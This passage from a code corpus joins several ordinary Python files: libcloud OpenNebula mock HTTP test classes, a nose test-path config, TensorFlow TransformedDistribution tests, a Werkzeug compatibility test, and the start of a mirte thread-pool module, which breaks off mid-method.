httplib.responses[httplib.ACCEPTED])
if method == 'DELETE':
body = ""
return (httplib.OK, body, {},
httplib.responses[httplib.OK])
def _compute_15(self, method, url, body, headers):
"""
Compute entry resource.
"""
if method == 'GET':
body = self.fixtures.load('compute_15.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
if method == 'PUT':
body = ""
return (httplib.ACCEPTED, body, {},
httplib.responses[httplib.ACCEPTED])
if method == 'DELETE':
body = ""
return (httplib.OK, body, {},
httplib.responses[httplib.OK])
def _compute_25(self, method, url, body, headers):
"""
Compute entry resource.
"""
if method == 'GET':
body = self.fixtures.load('compute_25.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
if method == 'PUT':
body = ""
return (httplib.ACCEPTED, body, {},
httplib.responses[httplib.ACCEPTED])
if method == 'DELETE':
body = ""
return (httplib.OK, body, {},
httplib.responses[httplib.OK])
def _storage_5(self, method, url, body, headers):
"""
Storage entry resource.
"""
if method == 'GET':
body = self.fixtures.load('disk_5.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
if method == 'DELETE':
body = ""
return (httplib.OK, body, {},
httplib.responses[httplib.OK])
def _storage_15(self, method, url, body, headers):
"""
Storage entry resource.
"""
if method == 'GET':
body = self.fixtures.load('disk_15.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
if method == 'DELETE':
body = ""
return (httplib.OK, body, {},
httplib.responses[httplib.OK])
def _network_5(self, method, url, body, headers):
"""
Network entry resource.
"""
if method == 'GET':
body = self.fixtures.load('network_5.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
if method == 'DELETE':
body = ""
return (httplib.OK, body, {},
httplib.responses[httplib.OK])
def _network_15(self, method, url, body, headers):
"""
Network entry resource.
"""
if method == 'GET':
body = self.fixtures.load('network_15.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
if method == 'DELETE':
body = ""
return (httplib.OK, body, {},
httplib.responses[httplib.OK])
class OpenNebula_2_0_MockHttp(MockHttp):
"""
Mock HTTP server for testing v2.0 through v3.2 of the OpenNebula.org
compute driver.
"""
fixtures = ComputeFileFixtures('opennebula_2_0')
def _compute(self, method, url, body, headers):
"""
Compute pool resources.
"""
if method == 'GET':
body = self.fixtures.load('compute_collection.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
if method == 'POST':
body = self.fixtures.load('compute_5.xml')
return (httplib.CREATED, body, {},
httplib.responses[httplib.CREATED])
def _storage(self, method, url, body, headers):
"""
Storage pool resources.
"""
if method == 'GET':
body = self.fixtures.load('storage_collection.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
if method == 'POST':
body = self.fixtures.load('storage_5.xml')
return (httplib.CREATED, body, {},
httplib.responses[httplib.CREATED])
def _network(self, method, url, body, headers):
"""
Network pool resources.
"""
if method == 'GET':
body = self.fixtures.load('network_collection.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
if method == 'POST':
body = self.fixtures.load('network_5.xml')
return (httplib.CREATED, body, {},
httplib.responses[httplib.CREATED])
def _compute_5(self, method, url, body, headers):
"""
Compute entry resource.
"""
if method == 'GET':
body = self.fixtures.load('compute_5.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
if method == 'PUT':
body = ""
return (httplib.ACCEPTED, body, {},
httplib.responses[httplib.ACCEPTED])
if method == 'DELETE':
body = ""
return (httplib.NO_CONTENT, body, {},
httplib.responses[httplib.NO_CONTENT])
def _compute_15(self, method, url, body, headers):
"""
Compute entry resource.
"""
if method == 'GET':
body = self.fixtures.load('compute_15.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
if method == 'PUT':
body = ""
return (httplib.ACCEPTED, body, {},
httplib.responses[httplib.ACCEPTED])
if method == 'DELETE':
body = ""
return (httplib.NO_CONTENT, body, {},
httplib.responses[httplib.NO_CONTENT])
def _compute_25(self, method, url, body, headers):
"""
Compute entry resource.
"""
if method == 'GET':
body = self.fixtures.load('compute_25.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
if method == 'PUT':
body = ""
return (httplib.ACCEPTED, body, {},
httplib.responses[httplib.ACCEPTED])
if method == 'DELETE':
body = ""
return (httplib.NO_CONTENT, body, {},
httplib.responses[httplib.NO_CONTENT])
def _storage_5(self, method, url, body, headers):
"""
Storage entry resource.
"""
if method == 'GET':
body = self.fixtures.load('storage_5.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
if method == 'DELETE':
body = ""
return (httplib.NO_CONTENT, body, {},
httplib.responses[httplib.NO_CONTENT])
def _storage_15(self, method, url, body, headers):
"""
Storage entry resource.
"""
if method == 'GET':
body = self.fixtures.load('storage_15.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
if method == 'DELETE':
body = ""
return (httplib.NO_CONTENT, body, {},
httplib.responses[httplib.NO_CONTENT])
def _network_5(self, method, url, body, headers):
"""
Network entry resource.
"""
if method == 'GET':
body = self.fixtures.load('network_5.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
if method == 'DELETE':
body = ""
return (httplib.NO_CONTENT, body, {},
httplib.responses[httplib.NO_CONTENT])
def _network_15(self, method, url, body, headers):
"""
Network entry resource.
"""
if method == 'GET':
body = self.fixtures.load('network_15.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
if method == 'DELETE':
body = ""
return (httplib.NO_CONTENT, body, {},
httplib.responses[httplib.NO_CONTENT])
class OpenNebula_3_0_MockHttp(OpenNebula_2_0_MockHttp):
"""
Mock HTTP server for testing v3.0 of the OpenNebula.org compute driver.
"""
fixtures_3_0 = ComputeFileFixtures('opennebula_3_0')
def _network(self, method, url, body, headers):
"""
Network pool resources.
"""
if method == 'GET':
body = self.fixtures_3_0.load('network_collection.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
if method == 'POST':
body = self.fixtures.load('network_5.xml')
return (httplib.CREATED, body, {},
httplib.responses[httplib.CREATED])
def _network_5(self, method, url, body, headers):
"""
Network entry resource.
"""
if method == 'GET':
body = self.fixtures_3_0.load('network_5.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
if method == 'DELETE':
body = ""
return (httplib.NO_CONTENT, body, {},
httplib.responses[httplib.NO_CONTENT])
def _network_15(self, method, url, body, headers):
"""
Network entry resource.
"""
if method == 'GET':
body = self.fixtures_3_0.load('network_15.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
if method == 'DELETE':
body = ""
return (httplib.NO_CONTENT, body, {},
httplib.responses[httplib.NO_CONTENT])
class OpenNebula_3_2_MockHttp(OpenNebula_3_0_MockHttp):
"""
Mock HTTP server for testing v3.2 of the OpenNebula.org compute driver.
"""
fixtures_3_2 = ComputeFileFixtures('opennebula_3_2')
def _compute_5(self, method, url, body, headers):
"""
Compute entry resource.
"""
if method == 'GET':
body = self.fixtures.load('compute_5.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
if method == 'PUT':
body = ""
return (httplib.ACCEPTED, body, {},
httplib.responses[httplib.ACCEPTED])
if method == 'DELETE':
body = ""
return (httplib.NO_CONTENT, body, {},
httplib.responses[httplib.NO_CONTENT])
def _instance_type(self, method, url, body, headers):
"""
Instance type pool.
"""
if method == 'GET':
body = self.fixtures_3_2.load('instance_type_collection.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
class OpenNebula_3_6_MockHttp(OpenNebula_3_2_MockHttp):
"""
Mock HTTP server for testing v3.6 of the OpenNebula.org compute driver.
"""
fixtures_3_6 = ComputeFileFixtures('opennebula_3_6')
def _storage(self, method, url, body, headers):
if method == 'GET':
body = self.fixtures.load('storage_collection.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
if method == 'POST':
body = self.fixtures_3_6.load('storage_5.xml')
return (httplib.CREATED, body, {},
httplib.responses[httplib.CREATED])
def _compute_5(self, method, url, body, headers):
if method == 'GET':
body = self.fixtures_3_6.load('compute_5.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
if method == 'PUT':
body = ""
return (httplib.ACCEPTED, body, {},
httplib.responses[httplib.ACCEPTED])
if method == 'DELETE':
body = ""
return (httplib.NO_CONTENT, body, {},
httplib.responses[httplib.NO_CONTENT])
def _compute_5_action(self, method, url, body, headers):
body = self.fixtures_3_6.load('compute_5.xml')
if method == 'POST':
return (httplib.ACCEPTED, body, {},
httplib.responses[httplib.ACCEPTED])
if method == 'GET':
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
def _compute_15(self, method, url, body, headers):
if method == 'GET':
body = self.fixtures_3_6.load('compute_15.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
if method == 'PUT':
body = ""
return (httplib.ACCEPTED, body, {},
httplib.responses[httplib.ACCEPTED])
if method == 'DELETE':
body = ""
return (httplib.NO_CONTENT, body, {},
httplib.responses[httplib.NO_CONTENT])
def _storage_10(self, method, url, body, headers):
"""
Storage entry resource.
"""
if method == 'GET':
body = self.fixtures_3_6.load('disk_10.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
def _storage_15(self, method, url, body, headers):
"""
Storage entry resource.
"""
if method == 'GET':
body = self.fixtures_3_6.load('disk_15.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
class OpenNebula_3_8_MockHttp(OpenNebula_3_2_MockHttp):
"""
Mock HTTP server for testing v3.8 of the OpenNebula.org compute driver.
"""
fixtures_3_8 = ComputeFileFixtures('opennebula_3_8')
def _instance_type(self, method, url, body, headers):
"""
Instance type pool.
"""
if method == 'GET':
body = self.fixtures_3_8.load('instance_type_collection.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
def _instance_type_small(self, method, url, body, headers):
"""
Small instance type.
"""
if method == 'GET':
body = self.fixtures_3_8.load('instance_type_small.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
def _instance_type_medium(self, method, url, body, headers):
"""
Medium instance type.
"""
if method == 'GET':
body = self.fixtures_3_8.load('instance_type_medium.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
def _instance_type_large(self, method, url, body, headers):
"""
Large instance type.
"""
if method == 'GET':
body = self.fixtures_3_8.load('instance_type_large.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
if __name__ == '__main__':
sys.exit(unittest.main())
| apache-2.0 | -1,800,356,755,161,604,900 | 35.863315 | 78 | 0.580391 | false |
wangjun/xiaohuangji | tests/test_config.py | 7 | 2111 | #-*-coding:utf-8-*-
"""
Copyright (c) 2012 wgx731 <[email protected]>
Permission is hereby granted, free of charge, to any person obtaining
a copy of this software and associated documentation files (the
'Software'), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
""" Nose test config file
config sys path for testing
"""
import os
import glob
import sys
TEST_DIR = os.path.abspath(os.path.dirname(__file__))
MAIN_CODE_DIR = os.path.abspath(os.path.join(TEST_DIR, os.path.pardir))
PLUGINS_CODE_DIR = os.path.abspath(os.path.join(MAIN_CODE_DIR, "plugins"))
# Result refers to result returned by plugin
WRONG_KEY_WORD_ERROR = "Missing or wrong keyword should not have result."
WRONG_RESULT_ERROR = "Correct keyword should have result."
WRONG_RESULT_FORMAT_ERROR = "Result should have correct format."
class TestBase(object):
@classmethod
def clean_up(klass, path, wildcard):
os.chdir(path)
for rm_file in glob.glob(wildcard):
os.unlink(rm_file)
@classmethod
def setup_class(klass):
sys.stderr.write("\nRunning %s\n" % klass)
@classmethod
def teardown_class(klass):
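# The "*.py?" wildcard matches the *.pyc / *.pyo byte-code files left
# behind by importing the test, plugin and main-code modules.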
klass.clean_up(TEST_DIR, "*.py?")
klass.clean_up(PLUGINS_CODE_DIR, "*.py?")
klass.clean_up(MAIN_CODE_DIR, "*.py?")
| mit | -9,189,972,180,593,177,000 | 33.048387 | 74 | 0.732354 | false |
ArtsiomCh/tensorflow | tensorflow/contrib/distributions/python/kernel_tests/transformed_distribution_test.py | 8 | 16622 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for TransformedDistribution."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from scipy import stats
from tensorflow.contrib import distributions
from tensorflow.contrib import linalg
from tensorflow.contrib.distributions.python.ops import bijectors
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.platform import test
bs = bijectors
ds = distributions
la = linalg
class TransformedDistributionTest(test.TestCase):
def _cls(self):
return ds.TransformedDistribution
def _make_unimplemented(self, name):
def _unimplemented(self, *args): # pylint: disable=unused-argument
raise NotImplementedError("{} not implemented".format(name))
return _unimplemented
def testTransformedDistribution(self):
g = ops.Graph()
with g.as_default():
mu = 3.0
sigma = 2.0
# Note: the Jacobian callable only works for this example; more generally
# you may or may not need a reduce_sum.
log_normal = self._cls()(
distribution=ds.Normal(loc=mu, scale=sigma),
bijector=bs.Exp(event_ndims=0))
sp_dist = stats.lognorm(s=sigma, scale=np.exp(mu))
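# exp(Normal(mu, sigma)) is lognormal; scipy parameterises that as
# lognorm(s=sigma, scale=exp(mu)), so sp_dist is the reference density
# the transformed distribution should reproduce.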
# sample
sample = log_normal.sample(100000, seed=235)
self.assertAllEqual([], log_normal.event_shape)
with self.test_session(graph=g):
self.assertAllEqual([], log_normal.event_shape_tensor().eval())
self.assertAllClose(
sp_dist.mean(), np.mean(sample.eval()), atol=0.0, rtol=0.05)
# pdf, log_pdf, cdf, etc...
# The mean of the lognormal is around 148.
test_vals = np.linspace(0.1, 1000., num=20).astype(np.float32)
for func in [[log_normal.log_prob, sp_dist.logpdf],
[log_normal.prob, sp_dist.pdf],
[log_normal.log_cdf, sp_dist.logcdf],
[log_normal.cdf, sp_dist.cdf],
[log_normal.survival_function, sp_dist.sf],
[log_normal.log_survival_function, sp_dist.logsf]]:
actual = func[0](test_vals)
expected = func[1](test_vals)
with self.test_session(graph=g):
self.assertAllClose(expected, actual.eval(), atol=0, rtol=0.01)
def testNonInjectiveTransformedDistribution(self):
g = ops.Graph()
with g.as_default():
mu = 1.
sigma = 2.0
abs_normal = self._cls()(
distribution=ds.Normal(loc=mu, scale=sigma),
bijector=bs.AbsoluteValue(event_ndims=0))
sp_normal = stats.norm(mu, sigma)
# sample
sample = abs_normal.sample(100000, seed=235)
self.assertAllEqual([], abs_normal.event_shape)
with self.test_session(graph=g):
sample_ = sample.eval()
self.assertAllEqual([], abs_normal.event_shape_tensor().eval())
# Abs > 0, duh!
np.testing.assert_array_less(0, sample_)
# Let X ~ Normal(mu, sigma), Y := |X|, then
# P[Y < 0.77] = P[-0.77 < X < 0.77]
self.assertAllClose(
sp_normal.cdf(0.77) - sp_normal.cdf(-0.77),
(sample_ < 0.77).mean(), rtol=0.01)
# p_Y(y) = p_X(-y) + p_X(y),
self.assertAllClose(
sp_normal.pdf(1.13) + sp_normal.pdf(-1.13),
abs_normal.prob(1.13).eval())
# Log[p_Y(y)] = Log[p_X(-y) + p_X(y)]
self.assertAllClose(
np.log(sp_normal.pdf(2.13) + sp_normal.pdf(-2.13)),
abs_normal.log_prob(2.13).eval())
def testQuantile(self):
with self.test_session() as sess:
logit_normal = self._cls()(
distribution=ds.Normal(loc=0., scale=1.),
bijector=bs.Sigmoid(),
validate_args=True)
grid = [0., 0.25, 0.5, 0.75, 1.]
q = logit_normal.quantile(grid)
cdf = logit_normal.cdf(q)
cdf_ = sess.run(cdf)
self.assertAllClose(grid, cdf_, rtol=1e-6, atol=0.)
def testCachedSamples(self):
exp_forward_only = bs.Exp(event_ndims=0)
exp_forward_only._inverse = self._make_unimplemented(
"inverse")
exp_forward_only._inverse_event_shape_tensor = self._make_unimplemented(
"inverse_event_shape_tensor ")
exp_forward_only._inverse_event_shape = self._make_unimplemented(
"inverse_event_shape ")
exp_forward_only._inverse_log_det_jacobian = self._make_unimplemented(
"inverse_log_det_jacobian ")
with self.test_session() as sess:
mu = 3.0
sigma = 0.02
log_normal = self._cls()(
distribution=ds.Normal(loc=mu, scale=sigma),
bijector=exp_forward_only)
sample = log_normal.sample([2, 3], seed=42)
sample_val, log_pdf_val = sess.run([sample, log_normal.log_prob(sample)])
expected_log_pdf = stats.lognorm.logpdf(
sample_val, s=sigma, scale=np.exp(mu))
self.assertAllClose(expected_log_pdf, log_pdf_val, rtol=1e-4, atol=0.)
def testCachedSamplesInvert(self):
exp_inverse_only = bs.Exp(event_ndims=0)
exp_inverse_only._forward = self._make_unimplemented(
"forward")
exp_inverse_only._forward_event_shape_tensor = self._make_unimplemented(
"forward_event_shape_tensor ")
exp_inverse_only._forward_event_shape = self._make_unimplemented(
"forward_event_shape ")
exp_inverse_only._forward_log_det_jacobian = self._make_unimplemented(
"forward_log_det_jacobian ")
log_forward_only = bs.Invert(exp_inverse_only)
with self.test_session() as sess:
# The log bijector isn't defined over the whole real line, so we make
# sigma sufficiently small so that the draws are positive.
mu = 2.
sigma = 1e-2
exp_normal = self._cls()(
distribution=ds.Normal(loc=mu, scale=sigma),
bijector=log_forward_only)
sample = exp_normal.sample([2, 3], seed=42)
sample_val, log_pdf_val = sess.run([sample, exp_normal.log_prob(sample)])
expected_log_pdf = sample_val + stats.norm.logpdf(
np.exp(sample_val), loc=mu, scale=sigma)
self.assertAllClose(expected_log_pdf, log_pdf_val, atol=0.)
def testShapeChangingBijector(self):
with self.test_session():
softmax = bs.SoftmaxCentered()
standard_normal = ds.Normal(loc=0., scale=1.)
multi_logit_normal = self._cls()(
distribution=standard_normal,
bijector=softmax)
x = [[-np.log(3.), 0.],
[np.log(3), np.log(5)]]
y = softmax.forward(x).eval()
expected_log_pdf = (stats.norm(loc=0., scale=1.).logpdf(x) -
np.sum(np.log(y), axis=-1))
self.assertAllClose(expected_log_pdf,
multi_logit_normal.log_prob(y).eval())
self.assertAllClose(
[1, 2, 3, 2],
array_ops.shape(multi_logit_normal.sample([1, 2, 3])).eval())
self.assertAllEqual([2], multi_logit_normal.event_shape)
self.assertAllEqual([2], multi_logit_normal.event_shape_tensor().eval())
def testEntropy(self):
with self.test_session():
shift = np.array([[-1, 0, 1], [-1, -2, -3]], dtype=np.float32)
diag = np.array([[1, 2, 3], [2, 3, 2]], dtype=np.float32)
actual_mvn_entropy = np.concatenate([
[stats.multivariate_normal(shift[i], np.diag(diag[i]**2)).entropy()]
for i in range(len(diag))])
fake_mvn = self._cls()(
ds.MultivariateNormalDiag(
loc=array_ops.zeros_like(shift),
scale_diag=array_ops.ones_like(diag),
validate_args=True),
bs.AffineLinearOperator(
shift,
scale=la.LinearOperatorDiag(diag, is_non_singular=True),
validate_args=True),
validate_args=True)
self.assertAllClose(actual_mvn_entropy,
fake_mvn.entropy().eval())
def testScalarBatchScalarEventIdentityScale(self):
with self.test_session() as sess:
exp2 = self._cls()(
ds.Exponential(rate=0.25),
bijector=ds.bijectors.Affine(
scale_identity_multiplier=2.,
event_ndims=0))
log_prob = exp2.log_prob(1.)
log_prob_ = sess.run(log_prob)
base_log_prob = -0.5 * 0.25 + np.log(0.25)
ildj = np.log(2.)
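# y = 1 maps back to x = y / 2 = 0.5 under the scale-2 affine bijector, so
# log p_Y(1) = log p_X(0.5) + log|dx/dy| = base_log_prob - log(2).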
self.assertAllClose(base_log_prob - ildj, log_prob_, rtol=1e-6, atol=0.)
class ScalarToMultiTest(test.TestCase):
def _cls(self):
return ds.TransformedDistribution
def setUp(self):
self._shift = np.array([-1, 0, 1], dtype=np.float32)
self._tril = np.array([[[1., 0, 0],
[2, 1, 0],
[3, 2, 1]],
[[2, 0, 0],
[3, 2, 0],
[4, 3, 2]]],
dtype=np.float32)
def _testMVN(self,
base_distribution_class,
base_distribution_kwargs,
batch_shape=(),
event_shape=(),
not_implemented_message=None):
with self.test_session() as sess:
# Overriding shapes must be compatible w/bijector; most bijectors are
# batch_shape agnostic and only care about event_ndims.
# In the case of `Affine`, if we got it wrong then it would fire an
# exception due to incompatible dimensions.
batch_shape_pl = array_ops.placeholder(
dtypes.int32, name="dynamic_batch_shape")
event_shape_pl = array_ops.placeholder(
dtypes.int32, name="dynamic_event_shape")
feed_dict = {batch_shape_pl: np.array(batch_shape, dtype=np.int32),
event_shape_pl: np.array(event_shape, dtype=np.int32)}
fake_mvn_dynamic = self._cls()(
distribution=base_distribution_class(validate_args=True,
**base_distribution_kwargs),
bijector=bs.Affine(shift=self._shift, scale_tril=self._tril),
batch_shape=batch_shape_pl,
event_shape=event_shape_pl,
validate_args=True)
fake_mvn_static = self._cls()(
distribution=base_distribution_class(validate_args=True,
**base_distribution_kwargs),
bijector=bs.Affine(shift=self._shift, scale_tril=self._tril),
batch_shape=batch_shape,
event_shape=event_shape,
validate_args=True)
actual_mean = np.tile(self._shift, [2, 1]) # Affine elided this tile.
actual_cov = np.matmul(self._tril, np.transpose(self._tril, [0, 2, 1]))
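# Pushing the base MVN through the affine bijector turns its identity
# covariance into scale_tril @ scale_tril^T and shifts the mean, which is
# what actual_mean / actual_cov encode for the reference scipy density.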
def actual_mvn_log_prob(x):
return np.concatenate([
[stats.multivariate_normal(
actual_mean[i], actual_cov[i]).logpdf(x[:, i, :])]
for i in range(len(actual_cov))]).T
actual_mvn_entropy = np.concatenate([
[stats.multivariate_normal(
actual_mean[i], actual_cov[i]).entropy()]
for i in range(len(actual_cov))])
self.assertAllEqual([3], fake_mvn_static.event_shape)
self.assertAllEqual([2], fake_mvn_static.batch_shape)
self.assertAllEqual(tensor_shape.TensorShape(None),
fake_mvn_dynamic.event_shape)
self.assertAllEqual(tensor_shape.TensorShape(None),
fake_mvn_dynamic.batch_shape)
x = fake_mvn_static.sample(5, seed=0).eval()
for unsupported_fn in (fake_mvn_static.log_cdf,
fake_mvn_static.cdf,
fake_mvn_static.survival_function,
fake_mvn_static.log_survival_function):
with self.assertRaisesRegexp(NotImplementedError,
not_implemented_message):
unsupported_fn(x)
num_samples = 5e3
for fake_mvn, feed_dict in ((fake_mvn_static, {}),
(fake_mvn_dynamic, feed_dict)):
# Ensure sample works by checking first, second moments.
y = fake_mvn.sample(int(num_samples), seed=0)
x = y[0:5, ...]
sample_mean = math_ops.reduce_mean(y, 0)
centered_y = array_ops.transpose(y - sample_mean, [1, 2, 0])
sample_cov = math_ops.matmul(
centered_y, centered_y, transpose_b=True) / num_samples
[
sample_mean_,
sample_cov_,
x_,
fake_event_shape_,
fake_batch_shape_,
fake_log_prob_,
fake_prob_,
fake_entropy_,
] = sess.run([
sample_mean,
sample_cov,
x,
fake_mvn.event_shape_tensor(),
fake_mvn.batch_shape_tensor(),
fake_mvn.log_prob(x),
fake_mvn.prob(x),
fake_mvn.entropy(),
], feed_dict=feed_dict)
self.assertAllClose(actual_mean, sample_mean_, atol=0.1, rtol=0.1)
self.assertAllClose(actual_cov, sample_cov_, atol=0., rtol=0.1)
# Ensure all other functions work as intended.
self.assertAllEqual([5, 2, 3], x_.shape)
self.assertAllEqual([3], fake_event_shape_)
self.assertAllEqual([2], fake_batch_shape_)
self.assertAllClose(actual_mvn_log_prob(x_), fake_log_prob_,
atol=0., rtol=1e-6)
self.assertAllClose(np.exp(actual_mvn_log_prob(x_)), fake_prob_,
atol=0., rtol=1e-5)
self.assertAllClose(actual_mvn_entropy, fake_entropy_,
atol=0., rtol=1e-6)
def testScalarBatchScalarEvent(self):
self._testMVN(
base_distribution_class=ds.Normal,
base_distribution_kwargs={"loc": 0., "scale": 1.},
batch_shape=[2],
event_shape=[3],
not_implemented_message="not implemented when overriding event_shape")
def testScalarBatchNonScalarEvent(self):
self._testMVN(
base_distribution_class=ds.MultivariateNormalDiag,
base_distribution_kwargs={"loc": [0., 0., 0.],
"scale_diag": [1., 1, 1]},
batch_shape=[2],
not_implemented_message="not implemented")
with self.test_session():
# Can't override event_shape for scalar batch, non-scalar event.
with self.assertRaisesRegexp(ValueError, "base distribution not scalar"):
self._cls()(
distribution=ds.MultivariateNormalDiag(loc=[0.], scale_diag=[1.]),
bijector=bs.Affine(shift=self._shift, scale_tril=self._tril),
batch_shape=[2],
event_shape=[3],
validate_args=True)
def testNonScalarBatchScalarEvent(self):
self._testMVN(
base_distribution_class=ds.Normal,
base_distribution_kwargs={"loc": [0., 0], "scale": [1., 1]},
event_shape=[3],
not_implemented_message="not implemented when overriding event_shape")
with self.test_session():
# Can't override batch_shape for non-scalar batch, scalar event.
with self.assertRaisesRegexp(ValueError, "base distribution not scalar"):
self._cls()(
distribution=ds.Normal(loc=[0.], scale=[1.]),
bijector=bs.Affine(shift=self._shift, scale_tril=self._tril),
batch_shape=[2],
event_shape=[3],
validate_args=True)
def testNonScalarBatchNonScalarEvent(self):
with self.test_session():
# Can't override event_shape and/or batch_shape for non_scalar batch,
# non-scalar event.
with self.assertRaisesRegexp(ValueError, "base distribution not scalar"):
self._cls()(
distribution=ds.MultivariateNormalDiag(loc=[[0.]],
scale_diag=[[1.]]),
bijector=bs.Affine(shift=self._shift, scale_tril=self._tril),
batch_shape=[2],
event_shape=[3],
validate_args=True)
if __name__ == "__main__":
test.main()
| apache-2.0 | -4,548,337,352,118,971,000 | 38.76555 | 80 | 0.588978 | false |
niieani/rethinkdb | test/rql_test/connections/http_support/werkzeug/testsuite/compat.py | 146 | 1117 | # -*- coding: utf-8 -*-
"""
werkzeug.testsuite.compat
~~~~~~~~~~~~~~~~~~~~~~~~~
Ensure that old stuff does not break on update.
:copyright: (c) 2014 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
import unittest
import warnings
from werkzeug.testsuite import WerkzeugTestCase
from werkzeug.wrappers import Response
from werkzeug.test import create_environ
class CompatTestCase(WerkzeugTestCase):
def test_old_imports(self):
from werkzeug.utils import Headers, MultiDict, CombinedMultiDict, \
Headers, EnvironHeaders
from werkzeug.http import Accept, MIMEAccept, CharsetAccept, \
LanguageAccept, ETags, HeaderSet, WWWAuthenticate, \
Authorization
def test_exposed_werkzeug_mod(self):
import werkzeug
for key in werkzeug.__all__:
# deprecated, skip it
if key in ('templates', 'Template'):
continue
getattr(werkzeug, key)
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(CompatTestCase))
return suite
| agpl-3.0 | 3,007,329,730,292,758,000 | 26.925 | 75 | 0.649955 | false |
bwesterb/mirte | src/threadPool.py | 1 | 5025 | from mirte.core import Module
from six.moves import range
import logging
import threading
try:
import prctl
except ImportError:
prctl = None
class ThreadPool(Module):
class Worker(threading.Thread):
def __init__(self, pool, l):
self._name = None
threading.Thread.__init__(self)
self.l = l
self.pool = pool
def run(self):
self.l.debug("Hello")
self.name = '(pristine)'
self.pool.cond.acquire()
self.pool.actualFT += 1
while True:
if not self.pool.running:
break
if not self.pool.jobs:
self.pool.cond.wait()
continue
job, name = self.pool.jobs.pop()
self.name = name
self.pool.actualFT -= 1
self.pool.cond.release()
try:
ret = job()
except Exception:
self.l.exception("Uncaught exception")
ret = True
# delete job. Otherwise job will stay alive
# while we wait on self.pool.cond
del(job)
self.pool.cond.acquire()
self.name = '(free)'
self.pool.actualFT += 1
self.pool.expectedFT += 1
if not ret:
break
self.pool.actualFT -= 1
self.pool.expectedFT -= 1
self.pool.workers.remove(self)
self.pool.cond.release()
self.l.debug("Bye (%s)" % self.name)
@property
def name(self):
return self._name
@name.setter
def name(self, value):
self._name = value
if prctl:
if value:
prctl.set_name(value)
else:
prctl.set_name('(no name)')
def __init__(self, *args, **kwargs):
super(ThreadPool, self).__init__(*args, **kwargs)
self.running = True
self.jobs = list()
self.cond = threading.Condition()
self.mcond = threading.Condition()
self.actualFT = 0 # actual number of free threads
self.expectedFT = 0 # expected number of free threads
self.expectedT = 0 # expected number of threads
self.ncreated = 0 # total number of threads created
self.workers = set()
def _remove_worker(self):
self._queue(lambda: False, False)
self.expectedT -= 1
def _create_worker(self):
self.ncreated += 1
self.expectedFT += 1
self.expectedT += 1
n = self.ncreated
l = logging.LoggerAdapter(self.l, {'sid': n})
t = ThreadPool.Worker(self, l)
self.workers.add(t)
t.start()
def start(self):
self.main_thread = threading.Thread(target=self.run)
self.main_thread.start()
def run(self):
self.mcond.acquire()
while self.running:
self.cond.acquire()
gotoSleep = False
tc = max(self.minFree - self.expectedFT
+ len(self.jobs),
self.min - self.expectedT)
td = min(self.expectedFT - len(self.jobs)
- self.maxFree,
self.expectedT - self.min)
if tc > 0:
for i in range(tc):
self._create_worker()
elif td > 0:
for i in range(td):
self._remove_worker()
else:
gotoSleep = True
self.cond.release()
if gotoSleep:
self.mcond.wait()
self.l.info("Waking and joining all workers")
with self.cond:
self.cond.notifyAll()
workers = list(self.workers)
